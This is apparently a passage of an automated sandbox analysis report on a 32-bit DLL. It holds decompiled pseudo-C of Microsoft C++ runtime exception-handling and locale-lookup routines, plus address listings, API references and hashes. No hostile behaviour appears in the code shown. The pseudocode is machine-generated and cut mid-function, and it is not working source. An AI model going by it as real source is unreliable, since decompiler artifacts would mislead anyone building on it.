					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6DA8C463(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6DA8C463(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6DA8C463(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6DA8A34B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6DA8C75F(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6DA8A783(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6DA8D1EE(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6DA8D1EE(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6DA9122B(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6DA8CE82( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6dad4b28) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6DA8A783(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6DA8CE6A( &_v64);
											E6DA8AA9D( &_v64, 0x6dab121c);
											L63:
											 *(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6DA8A53E(_t279, _t319, _t274);
											E6DA8D0EE(_a8, _a16, _t305);
											_t235 = E6DA8D2AB(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6DA8D065(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































              0x6da8c7df
              0x6da8c7e6
              0x6da8c7e8
              0x6da8c7f1
              0x6da8c7f7
              0x6da8c7ff
              0x6da8c801
              0x6da8c804
              0x6da8c80a
              0x6da8cb83
              0x6da8cb83
              0x6da8cb88
              0x6da8cb8a
              0x6da8cb8c
              0x6da8cb8f
              0x6da8cb90
              0x6da8cb93
              0x6da8cb99
              0x6da8ccb8
              0x6da8cb9f
              0x6da8cba1
              0x6da8cba8
              0x6da8cbab
              0x6da8cbae
              0x6da8cbb4
              0x6da8cbb6
              0x6da8cbbb
              0x6da8cbbe
              0x6da8cbc0
              0x6da8cbc6
              0x6da8cbc8
              0x6da8cbce
              0x6da8cbe3
              0x6da8cbe8
              0x6da8cbeb
              0x6da8cbed
              0x6da8ccb4
              0x00000000
              0x6da8ccb5
              0x6da8cbed
              0x6da8cbce
              0x6da8cbc6
              0x6da8cbbe
              0x6da8cbf3
              0x6da8cbf6
              0x6da8cbf9
              0x6da8cbfc
              0x6da8cbff
              0x6da8cc05
              0x6da8cc17
              0x6da8cc1c
              0x6da8cc1f
              0x6da8cc22
              0x6da8cc25
              0x6da8cc28
              0x6da8cc2b
              0x6da8cc2e
              0x00000000
              0x00000000
              0x6da8cc34
              0x6da8cc34
              0x6da8cc37
              0x6da8cc3a
              0x6da8cc49
              0x6da8cc4a
              0x6da8cc4a
              0x6da8cc4c
              0x6da8cc4f
              0x00000000
              0x00000000
              0x6da8cc51
              0x6da8cc54
              0x00000000
              0x00000000
              0x6da8cc62
              0x6da8cc64
              0x6da8cc67
              0x6da8cc69
              0x6da8cc71
              0x6da8cc71
              0x6da8cc74
              0x6da8cc76
              0x6da8cc78
              0x6da8cc94
              0x6da8cc99
              0x6da8cc9c
              0x6da8cc9c
              0x00000000
              0x6da8cc74
              0x6da8cc6b
              0x6da8cc6f
              0x00000000
              0x00000000
              0x00000000
              0x6da8cc9f
              0x6da8cca2
              0x6da8cca3
              0x6da8cca6
              0x6da8cca9
              0x6da8ccac
              0x6da8ccaf
              0x6da8ccaf
              0x00000000
              0x6da8cc3a
              0x6da8ccb9
              0x6da8ccbe
              0x6da8ccbf
              0x6da8ccc2
              0x6da8ccc5
              0x6da8ccc6
              0x6da8ccc7
              0x6da8ccc8
              0x6da8cccb
              0x6da8cccd
              0x6da8cd45
              0x6da8cd47
              0x6da8cd47
              0x6da8cccf
              0x6da8cccf
              0x6da8ccd2
              0x6da8ccd5
              0x00000000
              0x6da8ccd7
              0x6da8ccd7
              0x6da8ccda
              0x6da8ccdd
              0x6da8cce4
              0x6da8cce4
              0x6da8cce7
              0x6da8cce9
              0x6da8cceb
              0x6da8cd1d
              0x6da8cd1d
              0x6da8cd20
              0x6da8cd27
              0x6da8cd27
              0x6da8cd2a
              0x6da8cd2d
              0x6da8cd34
              0x6da8cd34
              0x6da8cd37
              0x6da8cd3e
              0x6da8cd40
              0x6da8cd40
              0x6da8cd39
              0x6da8cd39
              0x6da8cd3c
              0x00000000
              0x00000000
              0x6da8cd3c
              0x6da8cd2f
              0x6da8cd2f
              0x6da8cd32
              0x00000000
              0x00000000
              0x6da8cd32
              0x6da8cd22
              0x6da8cd22
              0x6da8cd25
              0x00000000
              0x00000000
              0x6da8cd25
              0x6da8cd41
              0x6da8cced
              0x6da8cced
              0x6da8cced
              0x6da8ccf0
              0x6da8ccf0
              0x6da8ccf2
              0x6da8ccf4
              0x00000000
              0x00000000
              0x6da8ccf6
              0x6da8ccf8
              0x6da8cd0c
              0x6da8cd0c
              0x6da8ccfa
              0x6da8ccfa
              0x6da8ccfd
              0x6da8cd00
              0x00000000
              0x6da8cd02
              0x6da8cd02
              0x6da8cd05
              0x6da8cd08
              0x6da8cd0a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8cd0a
              0x6da8cd00
              0x6da8cd15
              0x6da8cd15
              0x6da8cd17
              0x00000000
              0x6da8cd19
              0x6da8cd19
              0x6da8cd19
              0x00000000
              0x6da8cd17
              0x6da8cd10
              0x6da8cd12
              0x6da8cd12
              0x00000000
              0x6da8cd12
              0x6da8ccdf
              0x6da8ccdf
              0x6da8cce2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8cce2
              0x6da8ccdd
              0x6da8ccd5
              0x6da8cd48
              0x6da8cd4c
              0x6da8cd4c
              0x6da8c819
              0x6da8c819
              0x6da8c822
              0x6da8c91f
              0x6da8c91f
              0x6da8c922
              0x00000000
              0x6da8c851
              0x6da8c851
              0x6da8c856
              0x00000000
              0x6da8c85c
              0x6da8c85c
              0x6da8c864
              0x6da8cb1d
              0x6da8cb21
              0x6da8c86a
              0x6da8c86f
              0x6da8c872
              0x6da8c877
              0x6da8c87e
              0x6da8c883
              0x00000000
              0x6da8c8bb
              0x6da8c8c3
              0x6da8c927
              0x6da8c927
              0x6da8c92a
              0x6da8c92d
              0x6da8c92f
              0x6da8c932
              0x6da8c935
              0x6da8c93b
              0x6da8caec
              0x6da8caec
              0x6da8caef
              0x00000000
              0x6da8caf1
              0x6da8caf1
              0x6da8caf4
              0x00000000
              0x6da8cafa
              0x6da8cafa
              0x6da8cafd
              0x6da8cb00
              0x6da8cb01
              0x6da8cb02
              0x6da8cb05
              0x6da8cb06
              0x6da8cb09
              0x6da8cb0a
              0x6da8cb0f
              0x00000000
              0x6da8cb0f
              0x6da8caf4
              0x6da8c941
              0x6da8c941
              0x6da8c945
              0x00000000
              0x6da8c94b
              0x6da8c94b
              0x6da8c952
              0x6da8c96a
              0x6da8c96a
              0x6da8c96d
              0x6da8c970
              0x6da8c976
              0x6da8c986
              0x6da8c98b
              0x6da8c98e
              0x6da8c991
              0x6da8c994
              0x6da8c997
              0x6da8c99a
              0x6da8c99d
              0x6da8c9a3
              0x6da8c9a3
              0x6da8c9a6
              0x6da8c9a9
              0x6da8c9b8
              0x6da8c9b9
              0x6da8c9b9
              0x6da8c9bb
              0x6da8c9be
              0x6da8c9c4
              0x6da8c9c7
              0x6da8c9cd
              0x6da8c9cf
              0x6da8c9d2
              0x6da8c9d5
              0x6da8c9de
              0x6da8c9e1
              0x6da8c9e3
              0x6da8c9e3
              0x6da8c9e6
              0x6da8c9e9
              0x6da8c9ec
              0x6da8c9ef
              0x6da8c9f2
              0x6da8c9f7
              0x6da8c9f8
              0x6da8c9f9
              0x6da8c9fa
              0x6da8c9fb
              0x6da8c9fe
              0x6da8ca00
              0x6da8ca02
              0x00000000
              0x6da8ca04
              0x6da8ca04
              0x6da8ca04
              0x6da8ca07
              0x6da8ca0a
              0x6da8ca0c
              0x6da8ca0d
              0x6da8ca12
              0x6da8ca15
              0x6da8ca17
              0x00000000
              0x00000000
              0x6da8ca19
              0x6da8ca1a
              0x6da8ca1d
              0x6da8ca1f
              0x00000000
              0x6da8ca21
              0x6da8ca21
              0x6da8ca24
              0x6da8ca27
              0x00000000
              0x6da8ca27
              0x00000000
              0x6da8ca1f
              0x6da8ca3b
              0x6da8ca41
              0x6da8ca5e
              0x6da8ca63
              0x6da8ca63
              0x6da8ca66
              0x6da8ca66
              0x00000000
              0x6da8ca2a
              0x6da8ca2a
              0x6da8ca2b
              0x6da8ca2e
              0x6da8ca31
              0x6da8ca34
              0x6da8ca34
              0x00000000
              0x6da8ca39
              0x6da8c9d5
              0x6da8c9c7
              0x6da8ca69
              0x6da8ca6c
              0x6da8ca6d
              0x6da8ca70
              0x6da8ca73
              0x6da8ca76
              0x6da8ca79
              0x6da8ca79
              0x6da8ca82
              0x6da8ca85
              0x6da8ca85
              0x6da8c99d
              0x6da8ca88
              0x6da8ca8c
              0x6da8ca8e
              0x6da8ca91
              0x6da8ca97
              0x6da8ca97
              0x6da8ca9f
              0x6da8caa4
              0x6da8cb12
              0x6da8cb12
              0x6da8cb17
              0x6da8cb1b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8caa6
              0x6da8caa6
              0x6da8caaa
              0x6da8cabc
              0x6da8cabf
              0x6da8cac2
              0x6da8cac4
              0x6da8cadb
              0x6da8cadf
              0x6da8cae5
              0x6da8cae6
              0x6da8cae8
              0x00000000
              0x6da8caea
              0x00000000
              0x6da8caea
              0x6da8cac6
              0x6da8cacb
              0x6da8cace
              0x6da8cad3
              0x6da8cad6
              0x00000000
              0x6da8cad6
              0x6da8caac
              0x6da8caaf
              0x6da8cab2
              0x6da8cab4
              0x00000000
              0x6da8cab6
              0x6da8cab6
              0x6da8caba
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8caba
              0x6da8cab4
              0x6da8caaa
              0x6da8c954
              0x6da8c954
              0x6da8c95b
              0x00000000
              0x6da8c95d
              0x6da8c95d
              0x6da8c964
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8c964
              0x6da8c95b
              0x6da8c952
              0x6da8c945
              0x6da8c8c5
              0x6da8c8cd
              0x6da8c8d0
              0x6da8c8d5
              0x6da8c8d9
              0x6da8c8dc
              0x6da8c8e2
              0x6da8c8e5
              0x00000000
              0x6da8c8e7
              0x6da8c8e7
              0x6da8c8ea
              0x6da8c8ec
              0x6da8cb22
              0x6da8cb22
              0x00000000
              0x6da8c8f2
              0x6da8c8fa
              0x6da8c905
              0x00000000
              0x00000000
              0x6da8c90e
              0x6da8c911
              0x6da8c912
              0x6da8c915
              0x6da8c917
              0x00000000
              0x6da8c91d
              0x00000000
              0x6da8c91d
              0x00000000
              0x6da8c917
              0x6da8c8f2
              0x6da8cb27
              0x6da8cb27
              0x6da8cb29
              0x6da8cb2a
              0x6da8cb31
              0x6da8cb34
              0x6da8cb42
              0x6da8cb47
              0x6da8cb4c
              0x6da8cb4f
              0x6da8cb54
              0x6da8cb57
              0x6da8cb5a
              0x6da8cb5c
              0x6da8cb5e
              0x6da8cb5e
              0x6da8cb63
              0x6da8cb6f
              0x6da8cb75
              0x6da8cb7a
              0x6da8cb7d
              0x6da8cb7e
              0x00000000
              0x6da8cb7e
              0x6da8c8e5
              0x6da8c8c3
              0x6da8c883
              0x6da8c864
              0x6da8c856
              0x6da8c822

              APIs
              • IsInExceptionSpec.LIBVCRUNTIME ref: 6DA8C8DC
              • type_info::operator==.LIBVCRUNTIME ref: 6DA8C8FE
              • ___TypeMatch.LIBVCRUNTIME ref: 6DA8CA0D
              • IsInExceptionSpec.LIBVCRUNTIME ref: 6DA8CADF
              • _UnwindNestedFrames.LIBCMT ref: 6DA8CB63
              • CallUnexpected.LIBVCRUNTIME ref: 6DA8CB7E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2123188842-393685449
              • Opcode ID: 327ced46414c436831ab86afeb4d1cebe9738f67bdf3bc3f2b03a6eebb77e596
              • Instruction ID: 0183c17aa24aa56d85d254d74020624a9defea339edbd584e15f28c9fa3a3b65
              • Opcode Fuzzy Hash: 327ced46414c436831ab86afeb4d1cebe9738f67bdf3bc3f2b03a6eebb77e596
              • Instruction Fuzzy Hash: 9BB16875C0820AEFCF05CFA4D9849AEBBB6FF08314B15465AED116B216D730DAA1CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA85A50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 138COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E6DA85A50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				short _v56;
				char _v60;
				short _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v132;
				char _v148;
				intOrPtr _v220;
				signed int _v232;
				char _v240;
				signed int _v244;
				signed int _v256;
				signed int _v260;
				signed int _v272;
				intOrPtr _v280;
				signed int _v292;
				signed int _t218;
				signed int _t221;
				signed int _t224;
				signed int _t234;
				void* _t243;
				void* _t259;
				signed int _t262;
				unsigned int _t264;
				void* _t265;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				unsigned int _t285;
				void* _t286;
				signed int _t289;
				signed int _t304;
				signed int _t306;
				signed int _t307;
				unsigned int _t309;
				void* _t310;
				signed int _t324;
				signed int _t326;
				void* _t329;
				signed int _t334;
				signed int _t335;
				void* _t342;
				signed int _t347;
				signed int _t348;
				void* _t357;
				signed int _t362;
				signed int _t363;
				void* _t365;
				signed int _t367;
				signed int _t369;
				signed int* _t371;
				signed int* _t372;
				signed int* _t373;
				intOrPtr _t382;
				signed int _t388;
				signed int* _t394;
				signed int _t400;
				void* _t402;
				void* _t409;
				void* _t411;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t435;
				unsigned int _t437;
				signed int _t438;
				signed int _t449;
				signed int _t451;
				signed int _t453;
				signed int _t455;
				signed int _t456;
				intOrPtr _t457;
				signed int _t459;
				unsigned int _t460;
				signed int _t461;
				signed int _t463;
				signed int _t467;
				signed int _t468;
				signed int _t470;
				signed int _t473;
				signed int _t474;
				signed int _t476;
				unsigned int _t480;
				unsigned int _t482;
				unsigned int _t484;
				void* _t486;
				void* _t487;
				void* _t495;
				unsigned int _t498;
				void* _t499;
				unsigned int _t502;
				void* _t503;
				unsigned int _t505;
				void* _t506;
				void* _t508;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t531;

				_push(__ebx);
				_t365 = _t495;
				_t498 = (_t495 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t365 + 4));
				_t480 = _t498;
				_push(0xffffffff);
				_push(E6DAA25EC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t498;
				_push(_t365);
				_t499 = _t498 - 0x58;
				_push(__esi);
				_push(__edi);
				E6DA888D6( &_v40, 0);
				_v16 = 0;
				_t429 =  *0x6dad5060; // 0x0
				_t218 =  *0x6dad5c80; // 0x0
				_v36 = _t218;
				if(_t429 == 0) {
					E6DA888D6( &_v32, _t429);
					_t531 =  *0x6dad5060 - _t429; // 0x0
					if(_t531 == 0) {
						_t362 =  *0x6dad5048; // 0x0
						_t363 = _t362 + 1;
						 *0x6dad5048 = _t363;
						 *0x6dad5060 = _t363;
					}
					E6DA8892E( &_v32);
					_t429 =  *0x6dad5060; // 0x0
				}
				_t9 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
				_t382 =  *_t9;
				if(_t429 >=  *((intOrPtr*)(_t382 + 0xc))) {
					_t449 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t449 =  *( *((intOrPtr*)(_t382 + 8)) + _t429 * 4);
					if(_t449 == 0) {
						L8:
						__eflags =  *((char*)(_t382 + 0x14));
						if( *((char*)(_t382 + 0x14)) == 0) {
							L11:
							__eflags = _t449;
							if(_t449 != 0) {
								goto L6;
							} else {
								goto L12;
							}
						} else {
							_t357 = E6DA88AB3();
							__eflags = _t429 -  *((intOrPtr*)(_t357 + 0xc));
							if(_t429 >=  *((intOrPtr*)(_t357 + 0xc))) {
								L12:
								_t221 = _v36;
								__eflags = _t221;
								if(__eflags == 0) {
									_t449 = E6DA89399(_t429, _t449, __eflags, 0x18);
									_t502 = _t499 + 4;
									_v36 = _t449;
									_t24 =  *((intOrPtr*)(_t365 + 8)) + 4; // 0x6a108bc8
									_t224 =  *_t24;
									__eflags = _t224;
									if(_t224 == 0) {
										_t431 = 0x6daaf2c7;
									} else {
										_t431 =  *(_t224 + 0x18);
										__eflags = _t431;
										if(_t431 == 0) {
											_t26 = _t224 + 0x1c; // 0x6a108be4
											_t431 = _t26;
										}
									}
									E6DA888D6( &_v112, 0);
									_v108 = 0;
									_v104 = 0;
									_v100 = 0;
									_v96 = 0;
									_v92 = 0;
									_v88 = 0;
									_v84 = 0;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v16 = 8;
									__eflags = _t431;
									if(_t431 == 0) {
										E6DA88889("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t480);
										_t482 = _t502;
										_push(0xffffffff);
										_push(E6DAA265C);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t502;
										_t503 = _t502 - 0x3c;
										_push(_t365);
										_push(_t449);
										_push(_t431);
										E6DA888D6( &_v148, 0);
										_v132 = 0;
										_t432 =  *0x6dad5cb4; // 0x0
										_t367 =  *0x6dad5c7c; // 0x0
										__eflags = _t432;
										if(_t432 == 0) {
											E6DA888D6( &_v32, _t432);
											__eflags =  *0x6dad5cb4 - _t432; // 0x0
											if(__eflags == 0) {
												_t347 =  *0x6dad5048; // 0x0
												_t348 = _t347 + 1;
												__eflags = _t348;
												 *0x6dad5048 = _t348;
												 *0x6dad5cb4 = _t348;
											}
											E6DA8892E( &_v32);
											_t432 =  *0x6dad5cb4; // 0x0
										}
										_t388 =  *(_v8 + 4);
										__eflags = _t432 -  *((intOrPtr*)(_t388 + 0xc));
										if(_t432 >=  *((intOrPtr*)(_t388 + 0xc))) {
											_t451 = 0;
											__eflags = 0;
											goto L29;
										} else {
											_t451 =  *( *((intOrPtr*)(_t388 + 8)) + _t432 * 4);
											__eflags = _t451;
											if(_t451 == 0) {
												L29:
												__eflags =  *((char*)(_t388 + 0x14));
												if( *((char*)(_t388 + 0x14)) == 0) {
													L32:
													__eflags = _t451;
													if(_t451 != 0) {
														goto L27;
													} else {
														goto L33;
													}
												} else {
													_t342 = E6DA88AB3();
													__eflags = _t432 -  *((intOrPtr*)(_t342 + 0xc));
													if(_t432 >=  *((intOrPtr*)(_t342 + 0xc))) {
														L33:
														__eflags = _t367;
														if(__eflags == 0) {
															_t451 = E6DA89399(_t432, _t451, __eflags, 8);
															_t505 = _t503 + 4;
															_v32 = _t451;
															_t234 =  *(_v8 + 4);
															__eflags = _t234;
															if(_t234 == 0) {
																_t434 = 0x6daaf2c7;
															} else {
																_t434 =  *(_t234 + 0x18);
																__eflags = _t434;
																if(_t434 == 0) {
																	_t434 = _t234 + 0x1c;
																}
															}
															E6DA888D6( &_v88, 0);
															_v84 = 0;
															_v80 = 0;
															_v76 = 0;
															_v72 = 0;
															_v68 = 0;
															_v64 = 0;
															_v60 = 0;
															_v56 = 0;
															_v52 = 0;
															_v48 = 0;
															_v44 = 0;
															_v40 = 0;
															_v20 = 8;
															__eflags = _t434;
															if(_t434 == 0) {
																E6DA88889("bad locale name");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t482);
																_t484 = _t505;
																_push(0xffffffff);
																_push(E6DAA2685);
																_push( *[fs:0x0]);
																 *[fs:0x0] = _t505;
																_t506 = _t505 - 0xc;
																_push(_t367);
																_push(_t451);
																_push(_t434);
																E6DA888D6( &_v240, 0);
																_v220 = 0;
																_t435 =  *0x6dad5cb8; // 0x0
																_t369 =  *0x6dad5c78; // 0x0
																_v232 = _t369;
																__eflags = _t435;
																if(_t435 == 0) {
																	E6DA888D6( &_v40, _t435);
																	__eflags =  *0x6dad5cb8 - _t435; // 0x0
																	if(__eflags == 0) {
																		_t334 =  *0x6dad5048; // 0x0
																		_t335 = _t334 + 1;
																		__eflags = _t335;
																		 *0x6dad5048 = _t335;
																		 *0x6dad5cb8 = _t335;
																	}
																	E6DA8892E( &_v40);
																	_t435 =  *0x6dad5cb8; // 0x0
																}
																_t394 =  *(_v12 + 4);
																__eflags = _t435 - _t394[3];
																if(_t435 >= _t394[3]) {
																	_t453 = 0;
																	__eflags = 0;
																	goto L50;
																} else {
																	_t453 =  *(_t394[2] + _t435 * 4);
																	__eflags = _t453;
																	if(_t453 != 0) {
																		L58:
																		E6DA8892E( &_v44);
																		 *[fs:0x0] = _v32;
																		return _t453;
																	} else {
																		L50:
																		__eflags = _t394[5];
																		if(_t394[5] == 0) {
																			L53:
																			__eflags = _t453;
																			if(_t453 != 0) {
																				goto L58;
																			} else {
																				goto L54;
																			}
																		} else {
																			_t329 = E6DA88AB3();
																			__eflags = _t435 -  *((intOrPtr*)(_t329 + 0xc));
																			if(_t435 >=  *((intOrPtr*)(_t329 + 0xc))) {
																				L54:
																				__eflags = _t369;
																				if(_t369 == 0) {
																					_t243 = E6DA862F0(_t369, _t435,  &_v36, _v12);
																					_t508 = _t506 + 8;
																					__eflags = _t243 - 0xffffffff;
																					if(__eflags == 0) {
																						E6DA82950();
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t484);
																						_t486 = _t508;
